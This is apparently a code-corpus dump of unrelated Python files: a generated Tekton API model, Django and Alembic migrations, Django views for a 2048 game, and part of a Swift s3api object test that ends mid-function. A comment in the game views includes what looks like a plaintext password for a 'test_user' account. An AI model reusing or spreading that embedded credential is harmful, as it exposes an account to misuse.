{}), '(self.featureclass, outputdir,\n outputname)\n', (7765, 7811), False, 'import arcpy\n'), ((1021, 1083), 'arcpy.DisableArchiving_management', 'arcpy.DisableArchiving_management', (['self.featureclass', '"""DELETE"""'], {}), "(self.featureclass, 'DELETE')\n", (1054, 1083), False, 'import arcpy\n'), ((4345, 4505), 'arcpy.EnableEditorTracking_management', 'arcpy.EnableEditorTracking_management', (['self.featureclass', '"""CREATED_USER"""', '"""CREATED_DATE"""', '"""LAST_EDITED_USER"""', '"""LAST_EDITED_DATE"""', '"""NO_ADD_FIELDS"""', '"""UTC"""'], {}), "(self.featureclass, 'CREATED_USER',\n 'CREATED_DATE', 'LAST_EDITED_USER', 'LAST_EDITED_DATE', 'NO_ADD_FIELDS',\n 'UTC')\n", (4382, 4505), False, 'import arcpy\n'), ((5512, 5586), 'arcpy.ChangePrivileges_management', 'arcpy.ChangePrivileges_management', (['self.featureclass', 'user', '"""GRANT"""', 'edits'], {}), "(self.featureclass, user, 'GRANT', edits)\n", (5545, 5586), False, 'import arcpy\n'), ((6737, 6792), 'arcpy.Analyze_management', 'arcpy.Analyze_management', (['self.featureclass', 'components'], {}), '(self.featureclass, components)\n', (6761, 6792), False, 'import arcpy\n'), ((7013, 7098), 'arcpy.RebuildIndexes_management', 'arcpy.RebuildIndexes_management', (['self.gdb.sdeconn', '"""NO_SYSTEM"""', 'self.name', '"""ALL"""'], {}), "(self.gdb.sdeconn, 'NO_SYSTEM', self.name, 'ALL'\n )\n", (7044, 7098), False, 'import arcpy\n'), ((7441, 7492), 'arcpy.EnableArchiving_management', 'arcpy.EnableArchiving_management', (['self.featureclass'], {}), '(self.featureclass)\n', (7473, 7492), False, 'import arcpy\n'), ((2698, 2720), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (2710, 2720), False, 'import pathlib\n')] |
# Copyright 2020 The Tekton Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Tekton
Tekton Pipeline # noqa: E501
The version of the OpenAPI document: v0.17.2
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from tekton_pipeline.configuration import Configuration
class V1beta1EmbeddedTask(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'description': 'str',
'metadata': 'V1beta1PipelineTaskMetadata',
'params': 'list[V1beta1ParamSpec]',
'resources': 'V1beta1TaskResources',
'results': 'list[V1beta1TaskResult]',
'sidecars': 'list[V1beta1Sidecar]',
'step_template': 'V1Container',
'steps': 'list[V1beta1Step]',
'volumes': 'list[V1Volume]',
'workspaces': 'list[V1beta1WorkspaceDeclaration]'
}
attribute_map = {
'description': 'description',
'metadata': 'metadata',
'params': 'params',
'resources': 'resources',
'results': 'results',
'sidecars': 'sidecars',
'step_template': 'stepTemplate',
'steps': 'steps',
'volumes': 'volumes',
'workspaces': 'workspaces'
}
def __init__(self, description=None, metadata=None, params=None, resources=None, results=None, sidecars=None, step_template=None, steps=None, volumes=None, workspaces=None, local_vars_configuration=None): # noqa: E501
"""V1beta1EmbeddedTask - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._description = None
self._metadata = None
self._params = None
self._resources = None
self._results = None
self._sidecars = None
self._step_template = None
self._steps = None
self._volumes = None
self._workspaces = None
self.discriminator = None
if description is not None:
self.description = description
if metadata is not None:
self.metadata = metadata
if params is not None:
self.params = params
if resources is not None:
self.resources = resources
if results is not None:
self.results = results
if sidecars is not None:
self.sidecars = sidecars
if step_template is not None:
self.step_template = step_template
if steps is not None:
self.steps = steps
if volumes is not None:
self.volumes = volumes
if workspaces is not None:
self.workspaces = workspaces
@property
def description(self):
"""Gets the description of this V1beta1EmbeddedTask. # noqa: E501
Description is a user-facing description of the task that may be used to populate a UI. # noqa: E501
:return: The description of this V1beta1EmbeddedTask. # noqa: E501
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this V1beta1EmbeddedTask.
Description is a user-facing description of the task that may be used to populate a UI. # noqa: E501
:param description: The description of this V1beta1EmbeddedTask. # noqa: E501
:type: str
"""
self._description = description
@property
def metadata(self):
"""Gets the metadata of this V1beta1EmbeddedTask. # noqa: E501
:return: The metadata of this V1beta1EmbeddedTask. # noqa: E501
:rtype: V1beta1PipelineTaskMetadata
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this V1beta1EmbeddedTask.
:param metadata: The metadata of this V1beta1EmbeddedTask. # noqa: E501
:type: V1beta1PipelineTaskMetadata
"""
self._metadata = metadata
@property
def params(self):
"""Gets the params of this V1beta1EmbeddedTask. # noqa: E501
Params is a list of input parameters required to run the task. Params must be supplied as inputs in TaskRuns unless they declare a default value. # noqa: E501
:return: The params of this V1beta1EmbeddedTask. # noqa: E501
:rtype: list[V1beta1ParamSpec]
"""
return self._params
@params.setter
def params(self, params):
"""Sets the params of this V1beta1EmbeddedTask.
Params is a list of input parameters required to run the task. Params must be supplied as inputs in TaskRuns unless they declare a default value. # noqa: E501
:param params: The params of this V1beta1EmbeddedTask. # noqa: E501
:type: list[V1beta1ParamSpec]
"""
self._params = params
@property
def resources(self):
"""Gets the resources of this V1beta1EmbeddedTask. # noqa: E501
:return: The resources of this V1beta1EmbeddedTask. # noqa: E501
:rtype: V1beta1TaskResources
"""
return self._resources
@resources.setter
def resources(self, resources):
"""Sets the resources of this V1beta1EmbeddedTask.
:param resources: The resources of this V1beta1EmbeddedTask. # noqa: E501
:type: V1beta1TaskResources
"""
self._resources = resources
@property
def results(self):
"""Gets the results of this V1beta1EmbeddedTask. # noqa: E501
Results are values that this Task can output # noqa: E501
:return: The results of this V1beta1EmbeddedTask. # noqa: E501
:rtype: list[V1beta1TaskResult]
"""
return self._results
@results.setter
def results(self, results):
"""Sets the results of this V1beta1EmbeddedTask.
Results are values that this Task can output # noqa: E501
:param results: The results of this V1beta1EmbeddedTask. # noqa: E501
:type: list[V1beta1TaskResult]
"""
self._results = results
@property
def sidecars(self):
"""Gets the sidecars of this V1beta1EmbeddedTask. # noqa: E501
Sidecars are run alongside the Task's step containers. They begin before the steps start and end after the steps complete. # noqa: E501
:return: The sidecars of this V1beta1EmbeddedTask. # noqa: E501
:rtype: list[V1beta1Sidecar]
"""
return self._sidecars
@sidecars.setter
def sidecars(self, sidecars):
"""Sets the sidecars of this V1beta1EmbeddedTask.
Sidecars are run alongside the Task's step containers. They begin before the steps start and end after the steps complete. # noqa: E501
:param sidecars: The sidecars of this V1beta1EmbeddedTask. # noqa: E501
:type: list[V1beta1Sidecar]
"""
self._sidecars = sidecars
@property
def step_template(self):
"""Gets the step_template of this V1beta1EmbeddedTask. # noqa: E501
:return: The step_template of this V1beta1EmbeddedTask. # noqa: E501
:rtype: V1Container
"""
return self._step_template
@step_template.setter
def step_template(self, step_template):
"""Sets the step_template of this V1beta1EmbeddedTask.
:param step_template: The step_template of this V1beta1EmbeddedTask. # noqa: E501
:type: V1Container
"""
self._step_template = step_template
@property
def steps(self):
"""Gets the steps of this V1beta1EmbeddedTask. # noqa: E501
Steps are the steps of the build; each step is run sequentially with the source mounted into /workspace. # noqa: E501
:return: The steps of this V1beta1EmbeddedTask. # noqa: E501
:rtype: list[V1beta1Step]
"""
return self._steps
@steps.setter
def steps(self, steps):
"""Sets the steps of this V1beta1EmbeddedTask.
Steps are the steps of the build; each step is run sequentially with the source mounted into /workspace. # noqa: E501
:param steps: The steps of this V1beta1EmbeddedTask. # noqa: E501
:type: list[V1beta1Step]
"""
self._steps = steps
@property
def volumes(self):
"""Gets the volumes of this V1beta1EmbeddedTask. # noqa: E501
Volumes is a collection of volumes that are available to mount into the steps of the build. # noqa: E501
:return: The volumes of this V1beta1EmbeddedTask. # noqa: E501
:rtype: list[V1Volume]
"""
return self._volumes
@volumes.setter
def volumes(self, volumes):
"""Sets the volumes of this V1beta1EmbeddedTask.
Volumes is a collection of volumes that are available to mount into the steps of the build. # noqa: E501
:param volumes: The volumes of this V1beta1EmbeddedTask. # noqa: E501
:type: list[V1Volume]
"""
self._volumes = volumes
@property
def workspaces(self):
"""Gets the workspaces of this V1beta1EmbeddedTask. # noqa: E501
Workspaces are the volumes that this Task requires. # noqa: E501
:return: The workspaces of this V1beta1EmbeddedTask. # noqa: E501
:rtype: list[V1beta1WorkspaceDeclaration]
"""
return self._workspaces
@workspaces.setter
def workspaces(self, workspaces):
"""Sets the workspaces of this V1beta1EmbeddedTask.
Workspaces are the volumes that this Task requires. # noqa: E501
:param workspaces: The workspaces of this V1beta1EmbeddedTask. # noqa: E501
:type: list[V1beta1WorkspaceDeclaration]
"""
self._workspaces = workspaces
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1beta1EmbeddedTask):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1beta1EmbeddedTask):
return True
return self.to_dict() != other.to_dict()
| [
"tekton_pipeline.configuration.Configuration",
"six.iteritems"
]
| [((10862, 10895), 'six.iteritems', 'six.iteritems', (['self.openapi_types'], {}), '(self.openapi_types)\n', (10875, 10895), False, 'import six\n'), ((2520, 2535), 'tekton_pipeline.configuration.Configuration', 'Configuration', ([], {}), '()\n', (2533, 2535), False, 'from tekton_pipeline.configuration import Configuration\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-24 13:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('portal', '0006_auto_20170824_0950'),
]
operations = [
migrations.AddField(
model_name='sampledstackoverflowpost',
name='num_question_comments',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='question_score',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title',
field=models.CharField(default='', max_length=1182),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_coleman_liau_index',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_length',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_lexicon_count',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_percent_punctuation',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_percent_spaces',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_percent_uppercase',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_sentence_count',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_starts_capitalized',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='sampledredditthread',
name='title',
field=models.CharField(default='', max_length=1182),
),
migrations.AlterField(
model_name='stackoverflowanswer',
name='owner_user_id',
field=models.IntegerField(blank=True, db_index=True, null=True),
),
migrations.AlterField(
model_name='stackoverflowanswer',
name='parent_id',
field=models.IntegerField(db_index=True),
),
migrations.AlterField(
model_name='stackoverflowquestion',
name='accepted_answer_id',
field=models.IntegerField(blank=True, db_index=True, null=True),
),
migrations.AlterField(
model_name='stackoverflowquestion',
name='owner_user_id',
field=models.IntegerField(db_index=True),
),
]
| [
"django.db.models.CharField",
"django.db.models.BooleanField",
"django.db.models.IntegerField"
]
| [((431, 461), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (450, 461), False, 'from django.db import migrations, models\n'), ((607, 637), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (626, 637), False, 'from django.db import migrations, models\n'), ((774, 819), 'django.db.models.CharField', 'models.CharField', ([], {'default': '""""""', 'max_length': '(1182)'}), "(default='', max_length=1182)\n", (790, 819), False, 'from django.db import migrations, models\n'), ((975, 1005), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (994, 1005), False, 'from django.db import migrations, models\n'), ((1149, 1179), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1168, 1179), False, 'from django.db import migrations, models\n'), ((1330, 1360), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1349, 1360), False, 'from django.db import migrations, models\n'), ((1517, 1547), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1536, 1547), False, 'from django.db import migrations, models\n'), ((1699, 1729), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1718, 1729), False, 'from django.db import migrations, models\n'), ((1884, 1914), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1903, 1914), False, 'from django.db import migrations, models\n'), ((2066, 2096), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (2085, 2096), False, 'from django.db import migrations, models\n'), ((2252, 2286), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (2271, 2286), False, 'from django.db import migrations, models\n'), ((2420, 2465), 'django.db.models.CharField', 'models.CharField', ([], {'default': '""""""', 'max_length': '(1182)'}), "(default='', max_length=1182)\n", (2436, 2465), False, 'from django.db import migrations, models\n'), ((2607, 2664), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'blank': '(True)', 'db_index': '(True)', 'null': '(True)'}), '(blank=True, db_index=True, null=True)\n', (2626, 2664), False, 'from django.db import migrations, models\n'), ((2802, 2836), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'db_index': '(True)'}), '(db_index=True)\n', (2821, 2836), False, 'from django.db import migrations, models\n'), ((2985, 3042), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'blank': '(True)', 'db_index': '(True)', 'null': '(True)'}), '(blank=True, db_index=True, null=True)\n', (3004, 3042), False, 'from django.db import migrations, models\n'), ((3186, 3220), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'db_index': '(True)'}), '(db_index=True)\n', (3205, 3220), False, 'from django.db import migrations, models\n')] |
from infoclientLib import InfoClient
ic = InfoClient('localhost', 15002, 'localhost', 15003)
ic.add('roi-weightedave', 'active')
ic.start()
| [
"infoclientLib.InfoClient"
]
| [((43, 93), 'infoclientLib.InfoClient', 'InfoClient', (['"""localhost"""', '(15002)', '"""localhost"""', '(15003)'], {}), "('localhost', 15002, 'localhost', 15003)\n", (53, 93), False, 'from infoclientLib import InfoClient\n')] |
import json
from django.contrib.auth.models import User
from django.http import JsonResponse
from django.shortcuts import redirect, render
from .models import Game2048
# Create your views here.
# test_user
# 8!S#5RP!WVMACg
def game(request):
return render(request, 'game_2048/index.html')
def set_result(request):
user = request.user if str(
request.user) != "AnonymousUser" else User.objects.get(username='test_user')
if request.method == 'POST':
# Get the game state from the POST request
game_state = request.body
obj = Game2048.objects.get(user=user)
# Check if the game state idendical to the server game state
if game_state != obj.game_state:
# let string to JSON object
json_game_state = json.loads(game_state)
# extract value of best from JSON objest
obj.best_score = json_game_state['best']
obj.game_state = json_game_state # save JSON object to game_state
obj.save()
else:
return redirect('game_2048:game')
return JsonResponse("", safe=False)
def get_result(request):
# Check if user is logged in if not set user to test_user
user = request.user if str(
request.user) != "AnonymousUser" else User.objects.get(username='test_user')
if request.method == 'GET':
obj, created = Game2048.objects.get_or_create(user=user)
game_state = obj.game_state
return JsonResponse(game_state, safe=False)
| [
"django.shortcuts.render",
"json.loads",
"django.http.JsonResponse",
"django.shortcuts.redirect",
"django.contrib.auth.models.User.objects.get"
]
| [((260, 299), 'django.shortcuts.render', 'render', (['request', '"""game_2048/index.html"""'], {}), "(request, 'game_2048/index.html')\n", (266, 299), False, 'from django.shortcuts import redirect, render\n'), ((1086, 1114), 'django.http.JsonResponse', 'JsonResponse', (['""""""'], {'safe': '(False)'}), "('', safe=False)\n", (1098, 1114), False, 'from django.http import JsonResponse\n'), ((1467, 1503), 'django.http.JsonResponse', 'JsonResponse', (['game_state'], {'safe': '(False)'}), '(game_state, safe=False)\n', (1479, 1503), False, 'from django.http import JsonResponse\n'), ((405, 443), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'username': '"""test_user"""'}), "(username='test_user')\n", (421, 443), False, 'from django.contrib.auth.models import User\n'), ((1047, 1073), 'django.shortcuts.redirect', 'redirect', (['"""game_2048:game"""'], {}), "('game_2048:game')\n", (1055, 1073), False, 'from django.shortcuts import redirect, render\n'), ((1282, 1320), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'username': '"""test_user"""'}), "(username='test_user')\n", (1298, 1320), False, 'from django.contrib.auth.models import User\n'), ((791, 813), 'json.loads', 'json.loads', (['game_state'], {}), '(game_state)\n', (801, 813), False, 'import json\n')] |
"""change admin to boolean
Revision ID: e86dd3bc539c
Revises: <KEY>
Create Date: 2020-11-11 22:32:00.707936
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'e86dd3bc539c'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('email_address', sa.Column('active', sa.Boolean(), nullable=False))
op.add_column('email_address', sa.Column('email_password', sa.String(length=255), nullable=False))
op.add_column('email_address', sa.Column('last_mailbox_size', sa.Integer(), nullable=True))
op.add_column('email_address', sa.Column('last_updated', sa.DateTime(), nullable=True))
op.add_column('email_address', sa.Column('phishing_mail_detected', sa.Integer(), nullable=True))
op.add_column('user', sa.Column('is_active', sa.Boolean(), nullable=False))
op.add_column('user', sa.Column('is_admin', sa.Boolean(), nullable=True))
op.add_column('user', sa.Column('last_logged_in', sa.DateTime(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('user', 'last_logged_in')
op.drop_column('user', 'is_admin')
op.drop_column('user', 'is_active')
op.drop_column('email_address', 'phishing_mail_detected')
op.drop_column('email_address', 'last_updated')
op.drop_column('email_address', 'last_mailbox_size')
op.drop_column('email_address', 'email_password')
op.drop_column('email_address', 'active')
# ### end Alembic commands ###
| [
"sqlalchemy.DateTime",
"sqlalchemy.Boolean",
"alembic.op.drop_column",
"sqlalchemy.Integer",
"sqlalchemy.String"
]
| [((1221, 1261), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""last_logged_in"""'], {}), "('user', 'last_logged_in')\n", (1235, 1261), False, 'from alembic import op\n'), ((1266, 1300), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""is_admin"""'], {}), "('user', 'is_admin')\n", (1280, 1300), False, 'from alembic import op\n'), ((1305, 1340), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""is_active"""'], {}), "('user', 'is_active')\n", (1319, 1340), False, 'from alembic import op\n'), ((1345, 1402), 'alembic.op.drop_column', 'op.drop_column', (['"""email_address"""', '"""phishing_mail_detected"""'], {}), "('email_address', 'phishing_mail_detected')\n", (1359, 1402), False, 'from alembic import op\n'), ((1407, 1454), 'alembic.op.drop_column', 'op.drop_column', (['"""email_address"""', '"""last_updated"""'], {}), "('email_address', 'last_updated')\n", (1421, 1454), False, 'from alembic import op\n'), ((1459, 1511), 'alembic.op.drop_column', 'op.drop_column', (['"""email_address"""', '"""last_mailbox_size"""'], {}), "('email_address', 'last_mailbox_size')\n", (1473, 1511), False, 'from alembic import op\n'), ((1516, 1565), 'alembic.op.drop_column', 'op.drop_column', (['"""email_address"""', '"""email_password"""'], {}), "('email_address', 'email_password')\n", (1530, 1565), False, 'from alembic import op\n'), ((1570, 1611), 'alembic.op.drop_column', 'op.drop_column', (['"""email_address"""', '"""active"""'], {}), "('email_address', 'active')\n", (1584, 1611), False, 'from alembic import op\n'), ((431, 443), 'sqlalchemy.Boolean', 'sa.Boolean', ([], {}), '()\n', (441, 443), True, 'import sqlalchemy as sa\n'), ((525, 546), 'sqlalchemy.String', 'sa.String', ([], {'length': '(255)'}), '(length=255)\n', (534, 546), True, 'import sqlalchemy as sa\n'), ((631, 643), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (641, 643), True, 'import sqlalchemy as sa\n'), ((722, 735), 'sqlalchemy.DateTime', 'sa.DateTime', ([], {}), '()\n', (733, 735), True, 'import sqlalchemy as sa\n'), ((824, 836), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (834, 836), True, 'import sqlalchemy as sa\n'), ((903, 915), 'sqlalchemy.Boolean', 'sa.Boolean', ([], {}), '()\n', (913, 915), True, 'import sqlalchemy as sa\n'), ((982, 994), 'sqlalchemy.Boolean', 'sa.Boolean', ([], {}), '()\n', (992, 994), True, 'import sqlalchemy as sa\n'), ((1066, 1079), 'sqlalchemy.DateTime', 'sa.DateTime', ([], {}), '()\n', (1077, 1079), True, 'import sqlalchemy as sa\n')] |
# Copyright (c) 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from datetime import datetime
import hashlib
import os
from os.path import join
import time
from mock import patch
from swift.common import swob
from swift.common.swob import Request
from test.unit.common.middleware.s3api import S3ApiTestCase
from test.unit.common.middleware.s3api.test_s3_acl import s3acl
from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, \
Owner, Grant
from swift.common.middleware.s3api.etree import fromstring
from swift.common.middleware.s3api.utils import mktime, S3Timestamp
from test.unit.common.middleware.s3api.helpers import FakeSwift
def _wrap_fake_auth_middleware(org_func):
def fake_fake_auth_middleware(self, env):
org_func(env)
if 'swift.authorize_override' in env:
return
if 'HTTP_AUTHORIZATION' not in env:
return
_, authorization = env['HTTP_AUTHORIZATION'].split(' ')
tenant_user, sign = authorization.rsplit(':', 1)
tenant, user = tenant_user.rsplit(':', 1)
env['HTTP_X_TENANT_NAME'] = tenant
env['HTTP_X_USER_NAME'] = user
return fake_fake_auth_middleware
class TestS3ApiObj(S3ApiTestCase):
def setUp(self):
super(TestS3ApiObj, self).setUp()
self.object_body = 'hello'
self.etag = hashlib.md5(self.object_body).hexdigest()
self.last_modified = 'Fri, 01 Apr 2014 12:00:00 GMT'
self.response_headers = {'Content-Type': 'text/html',
'Content-Length': len(self.object_body),
'Content-Disposition': 'inline',
'Content-Language': 'en',
'x-object-meta-test': 'swift',
'etag': self.etag,
'last-modified': self.last_modified,
'expires': 'Mon, 21 Sep 2015 12:00:00 GMT',
'x-robots-tag': 'nofollow',
'cache-control': 'private'}
self.swift.register('GET', '/v1/AUTH_test/bucket/object',
swob.HTTPOk, self.response_headers,
self.object_body)
self.swift.register('PUT', '/v1/AUTH_test/bucket/object',
swob.HTTPCreated,
{'etag': self.etag,
'last-modified': self.last_modified,
'x-object-meta-something': 'oh hai'},
None)
def _test_object_GETorHEAD(self, method):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': method},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '200')
unexpected_headers = []
for key, val in self.response_headers.iteritems():
if key in ('Content-Length', 'Content-Type', 'content-encoding',
'last-modified', 'cache-control', 'Content-Disposition',
'Content-Language', 'expires', 'x-robots-tag'):
self.assertIn(key, headers)
self.assertEqual(headers[key], str(val))
elif key == 'etag':
self.assertEqual(headers[key], '"%s"' % val)
elif key.startswith('x-object-meta-'):
self.assertIn('x-amz-meta-' + key[14:], headers)
self.assertEqual(headers['x-amz-meta-' + key[14:]], val)
else:
unexpected_headers.append((key, val))
if unexpected_headers:
self.fail('unexpected headers: %r' % unexpected_headers)
self.assertEqual(headers['etag'],
'"%s"' % self.response_headers['etag'])
if method == 'GET':
self.assertEqual(body, self.object_body)
@s3acl
def test_object_HEAD_error(self):
# HEAD does not return the body even an error response in the
# specifications of the REST API.
# So, check the response code for error test of HEAD.
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPUnauthorized, {}, None)
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '403')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPForbidden, {}, None)
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '403')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPNotFound, {}, None)
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '404')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPPreconditionFailed, {}, None)
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '412')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPServerError, {}, None)
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '500')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPServiceUnavailable, {}, None)
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '500')
self.assertEqual(body, '') # sanity
def test_object_HEAD(self):
self._test_object_GETorHEAD('HEAD')
def _test_object_HEAD_Range(self, range_value):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Range': range_value,
'Date': self.get_date_header()})
return self.call_s3api(req)
@s3acl
def test_object_HEAD_Range_with_invalid_value(self):
range_value = ''
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'hoge'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes='
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes=1'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes=5-1'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes=5-10'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '416')
@s3acl
def test_object_HEAD_Range(self):
# update response headers
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPOk, self.response_headers,
self.object_body)
range_value = 'bytes=0-3'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '4')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 0-3'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
range_value = 'bytes=3-3'
status, headers, body = self._test_object_HEAD_Range(range_value)
